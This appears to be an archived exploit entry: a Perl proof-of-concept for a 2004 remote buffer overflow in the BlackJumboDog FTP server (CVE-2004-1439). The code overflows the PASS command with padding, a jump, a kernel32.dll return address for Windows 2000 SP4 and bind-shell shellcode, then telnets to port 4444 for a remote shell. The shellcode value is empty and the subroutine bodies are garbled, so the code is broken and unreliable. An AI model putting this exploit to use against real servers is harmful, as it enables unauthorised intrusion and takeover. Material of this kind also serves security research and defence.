BlackJumboDog FTP Server - Remote Buffer Overflow

Related Vulnerabilities: CVE-2004-1439  
Publish Date: 05 Aug 2004
Author: Tal Zeltzer
# blackJumboDog Exploit code by Tal zeltzer

use strict;
use IO::Socket::INET;

usage() unless(@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ]
my $shellcode =

my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

print "[+] Connected to host\r\n";


#receive banner

my $repcode = "220 ";
my $response = recv_reply($socket,$repcode);

#send USER command

my $username = "anonymous";
print $socket "USER $username\r\n";

$repcode = "";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

#Send PASS Command ( Evil Buffer )
# EIP At 308
# 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )

printf "[+] Sending shellcode\r\n";

my $buf = "A"x308;
$buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
$buf = $buf . "\x60\x2F\x4E\x7C";
$buf = $buf . $shellcode;
print $socket "PASS $buf\r\n";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

$repcode = "";
recv_reply($socket, $repcode);


system("telnet $host 4444");


sub usage
# print usage information
print "\nUsage: <host> <port>\n
<host> - The host to connect to
<port> - The TCP port\n\n";

sub recv_reply
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";

my $res="";
$res .= $_;
if (/$repcode/) { last; }
return $res;

# [2004-08-05]